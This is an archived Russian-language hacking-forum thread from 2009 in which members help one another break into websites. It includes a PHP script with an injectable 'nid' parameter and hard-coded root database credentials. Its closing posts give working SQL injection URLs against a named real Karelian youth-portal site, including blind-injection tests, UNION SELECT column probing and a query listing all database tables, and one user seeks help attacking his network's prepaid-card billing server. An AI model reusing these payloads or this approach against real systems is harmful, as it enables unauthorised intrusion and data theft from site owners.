ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.02.2009, 19:55
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
https://forum.antichat.ru/showpost.php?p=1108085&postcount=2
https://forum.antichat.ru/showpost.php?p=1108479&postcount=3
|
|
|
25.02.2009, 20:19
|
|
Новичок
Регистрация: 09.05.2006
Сообщений: 24
Провел на форуме:
168619
Репутация:
2
|
|
подскажите мне! у меня в сети есть сервак! через который сеть выходит в инет! на нем есть сайт статистики,вот я там полазил и нашёл такую штуку-в периоде с ...... по ..... если ставишь > то после поля даты появляется name=date_end> , а во втором окне если так же сделать,то будет name=date_beg>, а если поставить ' в самом поле периода вместо даты появляется вот так \' Так же доступно phpinfo.php
Что я могу тут сделать? я в php не оч шарю.И еще скажи мне если я через этот локальный сайт статистики ввожу карточку(которую покупаю для инета) он мне зачисляет на мой аккаунт деньги не выходя в нет! я вот думаю-значит бд карточек на серваке находится? или там другая система?
|
|
|
|
25.02.2009, 20:52
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
похоже на XSS. Вообще по такому описанию сказачть оч сложно. или давай ссылку(!!!!!) или расписывай подробнее.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
25.02.2009, 21:47
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871
Репутация:
16
|
|
пробую эту фишку - http://forum.antichat.ru/showpost.php?p=663815&postcount=2
скуля, 8 полей,во второе вттыкаю кавычку в хексе,вылазает ошибка,пробую подобрать во втором запросе колонки,ниче не получаеццо ( скрипт прочитал бажный, вот код, должна ли тут работать эта фишка или меня глючит?
PHP код:
<?php
// Libraries
include '../php-bin/PageFunctions.php';
include '../php-bin/lib/querylib.php';
$nid = @$_GET['nid'];
$category = @$_GET['category'];
// If no nid, exit
if ($nid == "")
{
echo("Error: no article ID");
exit;
}
// Create a PageFunctions object
$objPFunc = new PageFunctions();
$query = new Query('localhost', 'root', '4dm1n777', "www");
// Year hash
$tmonth = array();
$tmonth['1'] = "January";
$tmonth['2'] = "February";
$tmonth['3'] = "March";
$tmonth['4'] = "April";
$tmonth['5'] = "May";
$tmonth['6'] = "June";
$tmonth['7'] = "July";
$tmonth['8'] = "August";
$tmonth['9'] = "September";
$tmonth['10'] = "October";
$tmonth['11'] = "November";
$tmonth['12'] = "December";
$getitem = $query->SQL("select * from newsitem where nid = " . $nid . " limit 1");
$item = mysql_fetch_assoc($getitem);
$gettext = $query->SQL("select * from newstext where nid = " . $nid . " limit 1");
$text = mysql_fetch_assoc($gettext);
$getcat = $query->SQL("select ctitle from newscategory where cid = " . $item['cid'] . " limit 1");
$cattext = mysql_fetch_assoc($getcat);
$query->Disconnect();
?>
add: бажный параметр - nid
Последний раз редактировалось Napas; 25.02.2009 в 21:51..
|
|
|
|
26.02.2009, 00:51
|
|
Новичок
Регистрация: 09.05.2006
Сообщений: 24
Провел на форуме:
168619
Репутация:
2
|
|
Сообщение от Worms
подскажите мне! у меня в сети есть сервак! через который сеть выходит в инет! на нем есть сайт статистики,вот я там полазил и нашёл такую штуку-в периоде с ...... по ..... если ставишь > то после поля даты появляется name=date_end> , а во втором окне если так же сделать,то будет name=date_beg>, а если поставить ' в самом поле периода вместо даты появляется вот так \' Так же доступно phpinfo.php
Что я могу тут сделать? я в php не оч шарю.И еще скажи мне если я через этот локальный сайт статистики ввожу карточку(которую покупаю для инета) он мне зачисляет на мой аккаунт деньги не выходя в нет! я вот думаю-значит бд карточек на серваке находится? или там другая система?
вот сделал скрин- http://pic.rapidshare.ru/941552 оригинала и что получается
|
|
|
|
26.02.2009, 01:05
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780
Репутация:
585
|
|
Napas
А зачем ты подбираешь количество колонок, когда там без вариантов одна колонка?
|
|
|
|
26.02.2009, 09:57
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871
Репутация:
16
|
|
2 cr0w
хмм, всмысле во внутреннем запросе?
так должен прокатить трюк со внутренним запросом или нет? и если да,как его реализовать,а то чет у меня мозгов не хватает  |
|
|
|
26.02.2009, 13:07
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://molod.karelia.ru/portal/page/portal/molod/main/kur?art=5' Скуль или нет?
|
|
|
|
26.02.2009, 14:42
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
2Assembler
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=2+and+1=1+--+
вот скуль)) blind))
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+1,2,3,4,5,6,7,8,9,0,1+from+news+--+
The Error is: java.sql.SQLException: ORA-01790: выражение должно иметь тот же тип данных, что и соответствующее выражение
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+null,null,null,null,null,null,null, null,null,null,null+from+news+--+
Последний раз редактировалось j0ker13; 26.02.2009 в 14:48..
|
|
|
|
26.02.2009, 15:00
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
а вот и все таблички
http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+table_name,null,null,null,null,null ,null,null,null,null,null+from+sys.user_tables+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
